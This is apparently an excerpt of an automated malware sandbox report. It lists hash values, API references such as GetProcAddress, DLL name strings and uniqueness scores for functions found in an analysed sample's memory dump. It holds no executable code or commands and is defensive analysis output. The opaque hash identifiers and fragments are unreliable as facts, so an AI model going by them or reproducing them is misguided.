                                                          • Instruction Fuzzy Hash: AB418C76A10706DBCB00DFB9E8949EDBBB1FF38310B00816AC98593721E7750A4AEB45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID: EtwEventWriteStartScenario$K"$charmap.exe
                                                          • API String ID: 4139908857-3254226376
                                                          • Opcode ID: 40c8f62f6087819b411a221b0b83d3b6d427bd984bc7250810d83f0aa37d90f2
                                                          • Instruction ID: 6f3de5ccae825d4e8561d9fa151f0ceb1499750b399ab9ae65ecb8d6e0394d4d
                                                          • Opcode Fuzzy Hash: 40c8f62f6087819b411a221b0b83d3b6d427bd984bc7250810d83f0aa37d90f2
                                                          • Instruction Fuzzy Hash: 5C31E069A04382CFCB00DFB8EC48EED3FB1EB3A310B04406AC885D7B66E6340449E716
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetProcAddress.KERNEL32(?), ref: 004A42B3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: ddrawex.dll$Nqt
                                                          • API String ID: 190572456-494668020
                                                          • Opcode ID: 569bc4023d1a5c79054b1a62b707c896296703f84d1f5819f8cf8f6fd2ac9ddb
                                                          • Instruction ID: 3651d54df87e2428eab709647290cda3b38f23c502e353017288bad7ddd6208b
                                                          • Opcode Fuzzy Hash: 569bc4023d1a5c79054b1a62b707c896296703f84d1f5819f8cf8f6fd2ac9ddb
                                                          • Instruction Fuzzy Hash: 1D31247A9402069BDB00DF75DC95AED7BB1FF7A310F04416AE89093311D3B9094ADB05
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: api-ms-win-core-sysinfo-l1-1-0.dll$Nqt
                                                          • API String ID: 190572456-1420055301
                                                          • Opcode ID: 4fdc0f3b35a19ab07590cad4387887ffbced67ca9604701b3197bb38c285968b
                                                          • Instruction ID: 16024d2c18d38f20404b8fea170110ef5a0689291bfc1e0e3548704d20fab459
                                                          • Opcode Fuzzy Hash: 4fdc0f3b35a19ab07590cad4387887ffbced67ca9604701b3197bb38c285968b
                                                          • Instruction Fuzzy Hash: 4A113A75A51B459BCB00DF68D9908EC7BB1FF39300F1081BAD989D7321E774099ADB0A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: CIRCoInst.dll$Nqt
                                                          • API String ID: 190572456-2116923253
                                                          • Opcode ID: d85a9573aca781bdfeb3b25efdb9e441028f3b7cf45b63f4bb27824d34f02643
                                                          • Instruction ID: ad89369555c84550e432f4b56c4b254ad89f417958448035aef1db971efee374
                                                          • Opcode Fuzzy Hash: d85a9573aca781bdfeb3b25efdb9e441028f3b7cf45b63f4bb27824d34f02643
                                                          • Instruction Fuzzy Hash: 2C114C78E14305ABCB00DFA9E8D1ADDBBB0FF2C320B50807AA959D7362D7740945DB09
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: credssp.dll$Nqt
                                                          • API String ID: 190572456-1865208935
                                                          • Opcode ID: ae669b5b9cd43ccb5fc88142bf8475d31f4b0b0f21b6055983b09d8ad5a6587c
                                                          • Instruction ID: 8bb6dfcaf604ffe223437a973d084799d87f54d7c008f84643bd630154602d2f
                                                          • Opcode Fuzzy Hash: ae669b5b9cd43ccb5fc88142bf8475d31f4b0b0f21b6055983b09d8ad5a6587c
                                                          • Instruction Fuzzy Hash: 5C018F74A00706AFCB00EF69E894ADD7B71EF79310F18917ED044E7365DAB80409EB0A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%